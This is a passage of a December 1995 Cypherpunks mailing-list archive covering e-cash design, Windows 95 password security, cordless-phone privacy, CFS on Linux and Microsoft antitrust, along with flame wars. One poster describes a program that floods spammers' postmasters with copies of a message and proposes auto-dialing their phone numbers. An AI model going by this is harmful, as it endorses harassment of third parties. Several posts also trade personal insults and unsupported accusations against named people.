shell.portal.com (Hal) Date: Wed, 20 Dec 95 09:21:19 PST Subject: King Kong Does e$ Message-ID: <199512201719.JAA12291@jobe.shell.portal.com> Thanks to Bob Hettinga for typing that long message about the Microsoft "ecash" scheme. That is some nimble note-taking. I have a few comments on the scheme as Bob presented it, and as it compares to Digicash. I will follow up with some commentary about the politics involved. > Customer chooses secret s, serial number n, n=h(s) and amount. > Customer pays bank (by any method) the amount of the desired banknote > bank signs serial number and amount > Transaction may be anonymous (physical cash purchase at bank) pick > serial number, bank uses private signature to sign the serial number. >[...] > How is it used for payment > Payer simply gives bank note to payee by handing over the secret > payee immediately exchanges the banknote for new ones anonymously, if > desired > Old banknote is now invalid, since bank has its secret; hence payer > can't respend it > If the bank note is already invalid, bank rejcts exchange and informs > payee. > "In effect, these are disposable banknotes" The withdrawal protocol has some similarities to online Digicash ecash. In that system, you choose a random number s, calculate a one way function h(s), and get that signed by the bank. Unlike in the Microsoft scheme, blinding is used for the signature. I imagine Microsoft avoids blinding because of the patent situation, and possibly due to legal concerns about anonymity (more on this below). With Digicash, the coin is then the pair s, SIGN(h(s)). This is then given to the shop as payment. It can check the bank's signature, but that is not enough; being an online scheme, it must also turn the coin in at the bank to prevent double spending. The bank checks the signature and that the coin is well formed to accept it. The Microsoft scheme is like an unblinded version of this. The bank simply signs h(s) and gives that to the customer. This allows a simplification in the spending. Instead of passing s, SIGN(h(s)), it is enough just to pass s. The payee gives this to the bank (since this is an online system), which given s can calculate h(s) and check this against a list of all valid coins. It knows the valid coin numbers because it saw them when it signed them (unlike with Digicash). So there is a slight space savings in the spending protocol. It is also not necessary for the messages to and from the bank to be encrypted during the withdrawal protocol; neither knowing h(s) nor SIGN(h(s)) will allow an attacker to spend the coin, since he doesn't know s. A similar thing is true of DigiCash, though, where the blinded pre-signed or signed coins are useless to an attacker since he doesn't know the blinding factor. The big problem then with the Microsoft system is that it is not anonymous. As a result, it is technically not electronic cash, at least as the word is used in the literature. However we are seeing so many proposals like this, all of them wanting to capitalize on this magic word "cash", that I suppose the definition has to be considered to be shifting. In the new usage, virtually any payment system can be called cash if there is some way that users can be anonymous in using it. And since by allowing anonymous accounts virtually any payment system can do this, the word is becoming meaningless. The problem I see in practice with using their cash anonymously is how to buy it. If I have an account with the Bank of Microsoft, and I withdraw some "mcash", deducting it from my account balance, that mcash will be linkable to my account when I spend it. In order to be anonymous I have to buy the cash anonymously. I can walk into the local bank with a floppy and some dollar bills, but that is not practical in general. I could use mcash to buy some more mcash, but even if the second transaction is anonymous, the bank knows that I was the one who withdrew the first set of mcash, so it can link me to the second set when it is spent. The only good solution I can see is to use Digicash ecash to anonymously buy Microsoft mcash, but I doubt that that is what they had in mind! Frankly, what I see in this message is another example of something which is starting to become common: marketing to cypherpunks. In a way it is a very positive sign, that our views and concerns are becoming so well known and widespread that companies like Microsoft and Netscape are doing their best to keep on the good side of people like us, who are concerned about strong privacy and security. In some ways our attitudes are becoming dominant on the net, thanks to the many excellent writers here, as well as magazines like Wired, and groups like the EFF and other interest groups. But this influence is making us a target of companies who know that gaining our approval, or at least avoiding our criticism, is important for success on the net. In many cases, such as the recent flap over Netscape's attitudes towards key escrow, I detect a whiff of two sidedness, in which one attitude is presented for the benefit of government and law enforcement interests, while another posture, more acceptable to cypherpunks, is adopted on the net. With Microsoft, they use the magic word "cash" a great deal, in my view hoping that we will line up in favor of the idea. But as I have explained it is not really anonymous, no more so than any other payment system. And it is not at all clear that the kinds of anonymous accounts that would be necessary to really make it anonymous will be allowed. In that case, Microsoft can just shrug and say, "well, we tried." They get the best of both worlds. They make the government happy by providing a traceable payment system, while they look good on the net by pushing "electronic cash". I don't have any proof that this is exactly what is going on. But it is possible, and I think we have to be skeptical and at least open to the possibility that this kind of manipulation is occuring, no matter how many assurances we get from the companies involved that they are really on our side. Finance is a high stakes business and there is a lot of government regulation involved. Where our interests and the government's diverge, we need to watch closely to see whether the companies' actions match their words. This kind of marketing is going to continue to increase, I expect. Hal Finney From jya at pipeline.com Wed Dec 20 09:37:17 1995 From: jya at pipeline.com (John Young) Date: Wed, 20 Dec 95 09:37:17 PST Subject: KOD Message-ID: <199512201737.MAA29878@pipe6.nyc.pipeline.com> Congratulations to the cypherpunks named Newsweek's "Big Thinkers of tomorrow -- the list of 50 People Who Matter Most on the Internet." In the December 25 issue. And, sympathy for the Kiss of Death envynescent celebrity. From usura at berserk.com Wed Dec 20 11:15:06 1995 From: usura at berserk.com (Alex de Joode) Date: Wed, 20 Dec 95 11:15:06 PST Subject: CFS and Linux Message-ID: <199512201915.UAA00215@asylum.berserk.com> Is there anyone out there that has CFS running with Linux ? It installs fine on BSDi 2.0 but I'm unable to install it under Linux, I would appreciate it if some one would help me out. -AJ- From attila at primenet.com Wed Dec 20 11:16:39 1995 From: attila at primenet.com (attila) Date: Wed, 20 Dec 95 11:16:39 PST Subject: (fwd) Junk email address collection (from a junk emailer) In-Reply-To: Message-ID: On Tue, 19 Dec 1995, Rich Graves wrote: > Personally, I think anyone who uses dejanews as a way to grep Usenet is > an idiot, but since this idiot actually did spend several hours doing so, > and then sent unsolicited commercial email to several thousand people, > it's worth listening to him. > [snip] [START] "forcing" a change on DejaNews to strip addresses would defeat the "redeeming" value of such a database. Since I, like many, occasionally fall into the trap of opening my response before clutching in my brain, I used DejaNews to "count" the gaffes! Fortunely, none on that search, just the usual sloppy keyboard entry. and, coming down on DejaNews just puts the fire out in just one room of a conflagration. [CONTINUE] > Here it is: > > When one of these mailers goes to do a search (and from what I hear, many > of them do it on regular intervals to get new names) they cannot do a TERSE > search. Why? Because it cuts off the email addresses if you notice the > output. They cannot obtain addresses from this data. > > So what do they do? They do a VERBOSE search and this way the email > addresses are completely listed. > > Make a change to this VERBOSE search option so that it will only list the > partial email address, and you will eliminate THOUSANDS, if not millions of > unwanted email messages on the Net. > > I guarantee if they made this change to the site it would make a HUGE > difference. From what I hear, most newsreaders only list news post lists > by "author" and not by email address, so these companies cannot easily > strip names through regular newsgroup programs, and must use a service > (like Deja News) to compile large email lists. > [snip] [START] Searching with a news reader message by message would be more than painful! all they need to do to obtain names from any newsgroup is to scan the entire news base, or groups of interest. It took me less than a minute to strip names from the alt.religion tree. I dont think the spammers are too worried about adding a few names when groups are sorted by interest anyway. for amusement, I have started to code a simple program which takes a feed from procmail where known spammers are listed and it prepends a message about spamming and send 1 - n copies to the offenders' PostMaster. ...and, I will send them from my own address as a token of my affection.... The only aggravation is adding offender to procmail after finding the source as many are using remailers. If they have 800 numbers, there are always auto-dialers with a message.. .. I hate to waste the bandwidth, but the spammers are getting out of hand and procmail -> /dev/null is less than satisfying! [END] From jk at jaramillo.digit.ee Wed Dec 20 11:27:32 1995 From: jk at jaramillo.digit.ee (Jyri Kaljundi) Date: Wed, 20 Dec 95 11:27:32 PST Subject: FTC Privacy Initiative (fwd) Message-ID: ---------- Forwarded message ---------- Date: Wed, 20 Dec 1995 09:22:11 -0800 From: Internet Marketing Discussion List To: internet-marketing at popco.com Subject: FTC Privacy Initiative From: Lewis Rose The US Federal Trade Commission has launched a "Privacy Initiative" to investigate whether the information collected at websites (either that affirmatively submitted by a visitor via a form or information collected based upon a visitor's selection of pages at a site to reflect personal interests) should be the subject of regulation by the FTC. To get background on this effort, you may want to read a speech by FTC Commissioner Varney on Electronic Commerce and Privacy which is available at the FTC's site under speeches (www.ftc.gov) or the Advertising Law Internet Site (www.webcom.com/~lewrose/home.html) under speeches. This week the staff of the FTC established a mailing list to allow interested parties to discuss the issues surrounding the privacy interests of consumers visiting web sites. To subscribe, send the message "subscribe" (without the quotes) to privacy-request at ftc.gov I suspect most of the participants will not represent the internet marketing community and urge interested members of this list to subscribe and participate. So far, there have been only two posts-- one by me yesterday wondering why marketers on the internet should be treated any differently than marketers using more traditional media, followed by one post simply asserting that internet marketing privacy issues are completely different from those raised by traditional media. Lew Lewis Rose 202-857-6012 (voice) Arent Fox Kintner Plotkin & Kahn 202-857-6395 (fax) 1050 Connecticut Avenue, NW lewrose at arentfox.com (email) Washington DC 20036 Advertising and Marketing Law Advertising Law Internet Site http://www.webcom.com/~lewrose/home.html Net-Lawyers Mailing List: net-lawyers at lawlib.wuacc.edu From karl at cosmos.cosmos.att.com Wed Dec 20 11:34:36 1995 From: karl at cosmos.cosmos.att.com (Karl A. Siil) Date: Wed, 20 Dec 95 11:34:36 PST Subject: revised time quantization package (Unix & WIN32) available Message-ID: <2.2b9.32.19951220193213.006bd414@cosmos.cosmos.att.com> At 09:14 AM 12/20/95 EST, Dr. Dimitri Vulis wrote: ... >> Matt, if you're getting paid to read this list, I want a new contract. > >Karl, are you an unpaid volunteer at AT&T, or do you quit your job every >time you read your e-mail? Actually, AT&T has us record our time down to 15 minute intervals, which I obey religiously*. In this case, I'm writing my CP activity off to "People who can't see a joke without a :-)." * Note there should be a :-) here, too. Not speaking for the company... Karl From harmon at tenet.edu Wed Dec 20 11:37:37 1995 From: harmon at tenet.edu (Dan Harmon) Date: Wed, 20 Dec 95 11:37:37 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: <199512201858.NAA28293@jekyll.piermont.com> Message-ID: Perry, the only crypto code you seem to do is the unintelligble postings that you send to the list. .d On Wed, 20 Dec 1995, Perry E. Metzger wrote: > > Dan Harmon writes: > > If this is what you consider contributing them you seem to have some > > deep problems that cannot be solved here. You may have to seek professional > > help. Your continued and at times seemingly uncontrollable use of vulgar > > language may indicate a neurobiological disorder such as Tourette's > > syndrome. You really should have it checked out before you harm yourself > > and possibily others. > > Thank you for the pseudopsychology, but really, all you've done is > further confirm my diagnosis of "non-contributing asshole". > > When was the last time you did anything to actually help spread > cryptography, eh? > > If you'll pardon me, I have crypto code to get back to. > > .pm > From fricke at mae.engr.ucdavis.edu Wed Dec 20 11:40:53 1995 From: fricke at mae.engr.ucdavis.edu (Light Ray) Date: Wed, 20 Dec 95 11:40:53 PST Subject: What ever happened to... Cray Comp/NSA co-development In-Reply-To: <199512200022.LAA28002@sweeney.cs.monash.edu.au> Message-ID: On Wed, 20 Dec 1995, Jiri Baum wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Hello, > > tcmay wrote: > ... > > Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime > > has two factors.) > ... > > Can someone enlighten me as to what the two factors are? > The two factors of a prime number are itself and one. However, prime factoring usually refers to (?) factoring a number out into it's component prime numbers. Tobin Fricke From mrose at stsci.edu Wed Dec 20 11:52:20 1995 From: mrose at stsci.edu (Mike Rose) Date: Wed, 20 Dec 95 11:52:20 PST Subject: Motorola Secure Phone Message-ID: <9512201951.AA25492@MARIAN.SOGS.STSCI.EDU> >I saw a new cordless phone made by Motorola in a retail outlet today >that is supposedly "Secure from eavesdroppers." I asked the >salespeople for more technical info, but they weren't very helpful. >Does anyone have any information on this? I have one of these, it's a good phone. I think the security will stop only an off-the shelf scanner. My understanding is that the signal is not encrypted, but only phase-inverted or otherwise shifted. Mike From cpunk at remail.ecafe.org Wed Dec 20 12:16:19 1995 From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer) Date: Wed, 20 Dec 95 12:16:19 PST Subject: The Problem With Blaze And Weinstein Message-ID: <199512202018.UAA02824@pangaea.ang.ecafe.org> I'm not trying to start a flame war. I'm sure these people are very smart and have written lots of good code. I'm sure they're very nice and never kick their dogs. I'm just tired of people defending them as cypherpunks. They aren't cypherpunks. Neither has come out against GAK. They both carefully avoid commiting to any statement. They want us to think they're "one of us" but they don't want to be pinned down because they are double dipping on both sides of the fence. Blaze even does "research" on GAK. See his web page for evidence. Also the TIS report. The fact that he found a bug in clipper doesn't change this. It proves it. He works for the government, via att. Weinstein is actively promoting GAK by working at the company that the government has chosen to bring it to you now that att has failed. WHY IS EVERYONE SO QUICK TO DEFEND THESE PEOPLE? DO THEY HAVE YOU ALL SO IMPRESSED WITH THEIR MASTERS DEGREES THAT YOUR AFRAID TO LOOK CLOSELY? No, I did not post the RSA patch. I wouldn't touch any of that code with a 5 meter pole. To the guy who says write code: I've written plenty of code. Clue: your probably running some of it right now. I'm anonymous because I've seen FIRST HAND what the att lawyers do to people who tell the wrong kind of truth. Want me to be a 'nym. OK. s/ Bill Gates (he has good lawyers that can handle att and netscape) From zinc at zifi.genetics.utah.edu Wed Dec 20 12:22:01 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Wed, 20 Dec 95 12:22:01 PST Subject: CFS and Linux In-Reply-To: <199512201915.UAA00215@asylum.berserk.com> Message-ID: On Wed, 20 Dec 1995, Alex de Joode wrote: > Date: Wed, 20 Dec 1995 20:15:14 +0100 (MET) > From: Alex de Joode > To: cypherpunks at toad.com > Subject: CFS and Linux > > > Is there anyone out there that has CFS running with Linux ? > > It installs fine on BSDi 2.0 but I'm unable to install it > under Linux, I would appreciate it if some one would help > me out. i don't think i can help you at all but i do have it running on my linux box. i compiled it as ELF with gcc 2.7.0 and libc 5.0.9. unfortunately, i just tried to compile it again and it didn't work. i'm not sure what i've changed since then but i have updated some libraries and bin-utils so who knows. anyway, i know other people have it running too, it just seems really touchy to me. sorry for the lack of info/help, -pjf patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA! ** FINGER zinc-pgp at zifi.genetics.utah.edu for pgp public key - CRYPTO! zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu From attila at primenet.com Wed Dec 20 12:27:29 1995 From: attila at primenet.com (attila) Date: Wed, 20 Dec 95 12:27:29 PST Subject: on web standards: sent to Markoff In-Reply-To: <199512200844.AAA24193@netcom6.netcom.com> Message-ID: Markoff is not the best on criticism. write the editor direct. ---------------------------------- Microsoft particularly does seem to place a death grip on things, but more industry consortiums are forming and Billy has been required to accept the heat; Java is one, except Billy always finds a way to subvert the process. Billy is like Karl Marx' premise: "sign all treaties; break them when it is convenient." The conundrum is trying to decide "when" a particular company is a monopoly by either the classic definition of the Sherman and Clayton Acts or an effective monopoly, or "bad" player as defined in the Robinson-Patman act. Bill Gates more than satisfies the requirements of defining a monopoly in Sherman and Clayton with 85% of the desktop locked in and an assualt with "almost" standards on the open-system server market. NT is already garnering more than 25% of server installations in business --big business, since it will be "guaranteed" compatible with their desktop 95s. The rest of us, stay with the real thing. Add to MS' virtually absolute domination of the desktop and its impending domination of the commercial servers the fact that MS has 95% of the front line office products --WP, Spreadsheet, Database, and mail with the last be non-standard to long established rules and you do have a problem to be considered. Will the market correct itself? Very questionable since MS rode to its position on IBM's back and capitalized on IBM's failure to recognize what they had stumbled into. IBM did not fall by the market rejecting IBM --the market exploded with the PC for price and diversity reasons: you can not compare direct entry, full screen aplications and transportability of a PC against a looped, expensive main-frame connection, if the boss even approves the cost. However, Bill Gates' more serious offense involves the fair trade provisions of the Robinson-Patman act and the subsequent fine-tuning of the Federal Trade Commission (FTC) which has its own courts. Bill Gates has used his operating system dominance to force hardware vendors to ship MS products on _every_ machine, or pay substantial penalties in rates 2 and 3 times larger for all MS products --cheap only if it is universal. Under these conditions, why would they ship OS/2 or UNIX? Add a few more of his contractural items and Anne Bingaman was correct in charging Bill with restraint of trade. The real issue in DOJ v. MS was that although Bill complied with a consent decree, he _immediatley_ found other ways to apply the screw, and many of these newer terms are even worse, but more subtle. And, there is no question the verbal threats have been significantly worse. To software vendors it is the threat of denial of technical information on GUIs and APIs, to hardware manufacturers it is threats of ecomnomic sanctions, including publishing decertification of the platform for various WIN95 and NT compliant stickers, etc. Bill Gates is NOT an ethical businessman. If the fact was that Bill was able to garner his position from hard work, a better product, and a well-greased advertising and marketing organization would not justify the application of the classic Sherman and Clayton anti-trust rules; the market will either continue to accept them or not. However, Bill has used his position of 85% in OSs not only to dictate OS considerations, as bad as they are with DOS nothing more than a boot sector virus and Windows a pretty program loader, but he has used this position to dominate the applications market by bundling and forcing machine integrators to include the MicroSoft applications in return for the OEM discount on the operating systems. Preloading the market by those means is _not_ ethical or good business. Bill Gates _clearly_ violates the FTC provisons on ethical conduct and restraint of trade by a monopoly or quasi-monopoly position. Why were nearly 30 OEMs represented anonymously in "friend of the court" briefs? --and the first thing Billy's (hired virtually every high end firm in SF) attorneys' did was subpoena the _names_ of the consortium under the rules of evidence --welcome to the "Kiss of Death." Personally, I think it is time to dismember Bill Gates --give him a choice of his OS group or his applications group and literally force him to sell all direct or indirect interest in the one he does not choose, plus forego any involvement. An example of the "ill" is Gate's clear announcement that _all_ MS programs would now be geared to direct interface to the internet --again initially only the Microsft Network with proprietary standards. This may be commendable on the intended results of better integration to the world, but not in terms of free trade as _everything_ MS does is proprietary, or they do not release _correct_ API information until they have taken a commanding lead in the market (witness Compu$erve and the rest on no access to Win95 --IBM put their network and a button for other networks, with a working PPP interfacein the same folder). Anyone who thinks Bill Gates or Microsoft is a benevolent 800 pound gorilla has not paid attention in history classes: power corrupts absolute power corrupts absolutely. he who fails to heed history, is doomed to repeat it. (which is mankind's normal path) ATTILA From perry at piermont.com Wed Dec 20 12:27:31 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Dec 95 12:27:31 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: Message-ID: <199512202027.PAA28498@jekyll.piermont.com> Dan Harmon writes: > Perry, If my memory is correct, you are the one who has a history of being > a jerk. You know, Mr. Harmon, you can just keep posting my private mail to you all day, but you WILL start to annoy others after a while. [Just to be clear to others, this is the first of the several messages on the topic I've posted -- Mr. Harmon has been forwarding my private replies to the list. I think it all makes him look bad, but some people have no sense.] Perry From dmandl at bear.com Wed Dec 20 13:05:11 1995 From: dmandl at bear.com (David Mandl) Date: Wed, 20 Dec 95 13:05:11 PST Subject: KOD In-Reply-To: <199512201737.MAA29878@pipe6.nyc.pipeline.com> Message-ID: On Wed, 20 Dec 1995, John Young wrote: > Congratulations to the cypherpunks named Newsweek's "Big > Thinkers of tomorrow -- the list of 50 People Who Matter Most > on the Internet." In the December 25 issue. Can you reveal who they are? No way am I going to buy Newsweek to find out. --Dave. -- David Mandl Bear, Stearns & Co. Inc. Phone: (212) 272-3888 Email: dmandl at bear.com -- ******************************************************************************* Bear Stearns is not responsible for any recommendation, solicitation, offer or agreement or any information about any transaction, customer account or account activity contained in this communication. ******************************************************************************* From perry at piermont.com Wed Dec 20 13:18:16 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Dec 95 13:18:16 PST Subject: The Problem With Blaze And Weinstein In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org> Message-ID: <199512202117.QAA28656@jekyll.piermont.com> ECafe Anonymous Remailer writes: > I'm not trying to start a flame war. Really? > They aren't cypherpunks. > > Neither has come out against GAK. You obviously have never spoken to Matt. > Blaze even does "research" on GAK. No, he does research on private escrow. Thats not the same thing as GAK. Private escrow is sensible -- you don't want just one person with the keys to, say, the personel records. What happens if they get hit by a car? > DO THEY HAVE YOU ALL SO IMPRESSED WITH THEIR MASTERS DEGREES THAT > YOUR AFRAID TO LOOK CLOSELY? Actually, Matt has a Ph.D. from Princeton. > WHY IS EVERYONE SO QUICK TO DEFEND THESE PEOPLE? Maybe I defend Matt because I think I know him pretty well -- we met when he showed up at the Columbia U. computer science department in the mid 1980s, and among other things we shared an office at Bellcore for a year or two, and he's about as cryptography and privacy friendly a person as you can find. Maybe I defend him because you are likely an idiot who's never so much as chatted with him. Maybe I'm bored. Who knows. Perry From jsimmons at goblin.punk.net Wed Dec 20 13:46:32 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Wed, 20 Dec 95 13:46:32 PST Subject: Text version of Cyphernomicon Message-ID: <199512202145.NAA05944@goblin.punk.net> -----BEGIN PGP SIGNED MESSAGE----- ftp.goblin.punk.net/pub/docs/cypherfq.zip or cypherpunk.faq.gz - -- Jeff Simmons jsimmons at goblin.punk.net -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNiECeL8IP70uJJBAQGiRQQAlIXYZkpMy4OSD+2DNgSEdGRsFaPgEk6/ vckQsT8Wa3Kl1uhIvFo/c/FDnbH/1W+LtzfV28zve6UkauSdhe6kD4S6QI7itbRa PgbOgLEsFh9WxFOgTANozPQdumj1gnj/qoKxGKb5hBTT4O0jaPvA5bZY9LtPtl2E UjGdr5ap0Mo= =Kd54 -----END PGP SIGNATURE----- From jamesd at echeque.com Wed Dec 20 13:47:54 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 20 Dec 95 13:47:54 PST Subject: Political Cleanup program [NOISE] Message-ID: <199512202147.NAA00522@blob.best.net> Phill wrote: >>It is not simply an issue of money, it is an issue of national security. If a >>foreigner were to control the majority of the media there would be a significant >>threat to the national interest. This threat has been realised in the UK with >>the comming to power of Rupert Murdoch. Fortunately his influence on the US >>political scene has thus far been minor. In his own country he has brought down >>the government more than once. At 01:37 AM 12/20/95 -0500, Jim Ray wrote: >So what??? He gives us "The Simpsons" and "Married, With Children!" >[IMO] Rupert has done more for humor than any humor-impaired liberal >has ever done! Murdoch is bitterly hated by our elites, because things are speakable on his networks that are unspeakable on other networks. Hence their perfectly true claim that he has overthrown several governments. I hope he overthrows some more. I especially love the political humor on "married with children" Cypherpunk relevance: Murdoch got in deep shit because of his famous speech that the communication revolution would profoundly undermine the power of oppressive governments. Murdoch sometimes calls himself a libertarian, but he is more a conservative with bombs. Still, I am strongly in favor of bombs. It seems clear to me that Murdoch, whatever his political beliefs may be, has done much for liberty. He has been a powerful disruptive influence. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jrober39 at borg.com Tue Dec 19 21:59:14 1995 From: jrober39 at borg.com (JerelRobertson) Date: Wed, 20 Dec 1995 13:59:14 +0800 Subject: mailing list Message-ID: <199512150614.BAA05472@mail.borg.com> Hey I want to get on this list. How do I do it? From llurch at networking.stanford.edu Tue Dec 19 22:04:14 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Wed, 20 Dec 1995 14:04:14 +0800 Subject: ANNOUNCE: Windows 95 .PWL Security "Functionality Enhancement" Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I have been instructed that it is not a bug fix; it is a "Functionality Enhancement." Please note headers before replying -- you're probably in a Bcc field. The patch for the problem we started discussing on November 1st is dated yesterday, but no one outside Microsoft appears to have seen it until today. pr/password.htm started forwarding to the patch distribution page some time between 2PM and 7:30PM Pacific Time today (yes, I had hit "reload"). http://www.microsoft.com/windows/software/mspwlupd.htm http://www.windows.microsoft.com/software/mspwlupd.htm Anyone who uses passwords for just about anything -- network servers, dialup networking, remote registry services -- should get this patch. For a rough start at a technical discussion of the problem that this patch is supposed to solve, see http://www.c2.org/hackmsoft/ or the gopher list archive below. The Web page says it uses a 128-bit key. Intriguing. Anyone seen the CJR, or is Microsoft exempt? Microsoft had told various people that the new security algorithm would be published in advance and reviewed by outside security experts, but I have not been able to verify this. This was supposed to affect Windows for Workgroups as well; anyone know anything about that? - -rich owner-win95netbugs at lists.stanford.edu ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/ gopher://quixote.stanford.edu/1m/win95netbugs http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNENt43DXUbM57SdAQG4xwP9EqXu5wXBOfpThtEUikqngrQNpe7RGKSv FqNSlZnh6GKJff6zQnZ3GyH0lYU8Mg+ApJVmSeSxq3ApA5Oc+jTUW6B4RNm+bxfT YBSThGmGbNNt948E/7oyXJdYVtWhuAleQtU7LxKNJfXoQlO/R05cc8O0zj7EiBR+ 777AbiM201s= =K2IQ -----END PGP SIGNATURE----- From jpp at software.net Wed Dec 20 14:19:36 1995 From: jpp at software.net (John Pettitt) Date: Wed, 20 Dec 95 14:19:36 PST Subject: 900mhz digital phones - how much to trust ? Message-ID: <199512202219.OAA26567@software.net> Whats the current thinking on the security level of 900Mhz digital spread sectrum cordless phones? Clearly it's not a basic scanner job but how much more equipment is needed to monitor one ? John Pettitt, jpp at software.net VP Engineering, CyberSource Corporation, 415 473 3065 Favorite quote: "Security is mostly a superstition. It does not exist in nature, nor do the children of man as a whole experience it. Avoiding danger is no safer in the long run than outright exposure. Life is either a daring adventure, or nothing." - Helen Keller From jya at pipeline.com Wed Dec 20 14:23:30 1995 From: jya at pipeline.com (John Young) Date: Wed, 20 Dec 95 14:23:30 PST Subject: DCI_kgb Message-ID: <199512202222.RAA09658@pipe2.nyc.pipeline.com> The 12-20-95 WPost reports the Deutch/Perry move to kremlinize finance of the 13 spy agencies under the DCI -- to transform the "vaguely associated medieval guilds into a modern corporate team" -- and palmly slather $29 billion IC grease: National Forward Intelligence Program (CIA, NSA, DIA, NRO, parts of three G2s, DOE and FBI): $16bn. Tactical and Related Activities (warfighting support): $10bn. Joint Military Intelligence (cryptology, aerial recon, counter-narc and mapping): "Several billion." DCI_kgb (6 kgb) From sameer at c2.org Wed Dec 20 14:56:58 1995 From: sameer at c2.org (sameer) Date: Wed, 20 Dec 95 14:56:58 PST Subject: KOD In-Reply-To: Message-ID: <199512202251.OAA27128@infinity.c2.org> Rumor has it that I was listed there ... I haven't seen it though. > > On Wed, 20 Dec 1995, John Young wrote: > > > Congratulations to the cypherpunks named Newsweek's "Big > > Thinkers of tomorrow -- the list of 50 People Who Matter Most > > on the Internet." In the December 25 issue. > > Can you reveal who they are? No way am I going to buy Newsweek to > find out. > > --Dave. > > -- > David Mandl > Bear, Stearns & Co. Inc. > Phone: (212) 272-3888 > Email: dmandl at bear.com > > -- > ******************************************************************************* > Bear Stearns is not responsible for any recommendation, solicitation, offer or > agreement or any information about any transaction, customer account or account > activity contained in this communication. > ******************************************************************************* > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From jya at pipeline.com Wed Dec 20 14:58:22 1995 From: jya at pipeline.com (John Young) Date: Wed, 20 Dec 95 14:58:22 PST Subject: KOD Message-ID: <199512202258.RAA13656@pipe2.nyc.pipeline.com> Responding to msg by dmandl at bear.com (David Mandl) on Wed, 20 Dec 4:3 PM >Can you reveal who they are? No way am I going to buy >Newsweek to find out. Anyone out of Newsweek's range, return this msg, empty, to me to get the 50 mugshots, then ... sort out the living from the dead. Best not to cypherdunk the already nym-shot victims. Privacy is paramount, bellows this list, no? From hua at chromatic.com Wed Dec 20 15:03:30 1995 From: hua at chromatic.com (Ernest Hua) Date: Wed, 20 Dec 95 15:03:30 PST Subject: Please cut the "tude"! Message-ID: <199512202303.PAA02038@ohio.chromatic.com> The "tude" level is getting a bit out of hand. Please take your personal attacks elsewhere. Moderator, please beat them silly with a banana until they stop! Thanks! Ern From andr0id at midwest.net Wed Dec 20 15:18:01 1995 From: andr0id at midwest.net (Jason Rentz) Date: Wed, 20 Dec 95 15:18:01 PST Subject: ex encrypted script Message-ID: <199512202339.RAA05220@cdale1.midwest.net> Forgive me if this is a stupid question. I'm using AT&T unix Version 5 release 3.2.2 ( UNIX System V/386 Release 3.2) I have several simple scripts that are simple yet handle important realtime call proccessing tasks and remote control operations. These programs are my programs but are running on a system that is dialed into by the vendor once in a while. Is there a way to encrypt a script yet still allow it to be runnable? I know that the simple answer is to write it in C and compile it but I don't have the means of doing that at the moment. (i.e. there is not compiler on the system) I thought of a few simple protections but they all involve decrypting before running. Dr0id ( Computer Consulting & Management ) (P.O. Box 421 Cambria, IL 62915-0421) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1 dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63 NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA= =SgPT -----END PGP PUBLIC KEY BLOCK----- From futplex at pseudonym.com Wed Dec 20 15:28:01 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 20 Dec 95 15:28:01 PST Subject: [NOISE] revised time quantization package (Unix & WIN32) available In-Reply-To: Message-ID: <199512202327.SAA10742@thor.cs.umass.edu> Dan Harmon writes: > Perry, > > the only crypto code you seem to do is the unintelligble postings > that you send to the list. Keep this irrelevant crap off cypherpunks. -Futplex From futplex at pseudonym.com Wed Dec 20 15:37:18 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 20 Dec 95 15:37:18 PST Subject: The Problem 